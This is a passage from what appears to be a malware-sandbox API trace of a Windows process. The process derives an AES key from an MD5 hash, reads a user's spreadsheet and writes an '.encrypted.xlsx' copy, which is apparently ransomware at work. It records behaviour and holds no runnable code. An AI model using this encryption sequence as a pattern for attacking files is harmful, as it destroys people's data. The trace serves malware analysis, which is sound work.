CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.813] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.813] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.813] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.813] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.813] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.814] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.814] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.814] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.814] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.814] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.814] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.814] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0032.814] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.814] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.814] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.814] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.814] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.814] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0032.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.814] CryptDestroyHash (hHash=0x7c2100) returned 1 [0032.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0032.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0032.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0032.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.815] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0032.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0032.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7hwynz2k.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.815] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.815] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0032.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.815] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.816] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.816] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0032.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0032.817] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.encrypted.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7hwynz2k.encrypted.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0032.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0032.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.818] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0032.818] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.818] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0032.819] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0032.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0032.819] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0032.819] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0032.821] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x6c8, lpOverlapped=0x0) returned 1 [0032.821] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0032.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x106c8) returned 0x955018 [0032.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0032.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0032.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0032.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x106c8) returned 0x9656e8 [0032.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.825] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0032.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0032.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0032.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x106c8) returned 0x955018 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.827] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0032.827] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.827] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0032.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 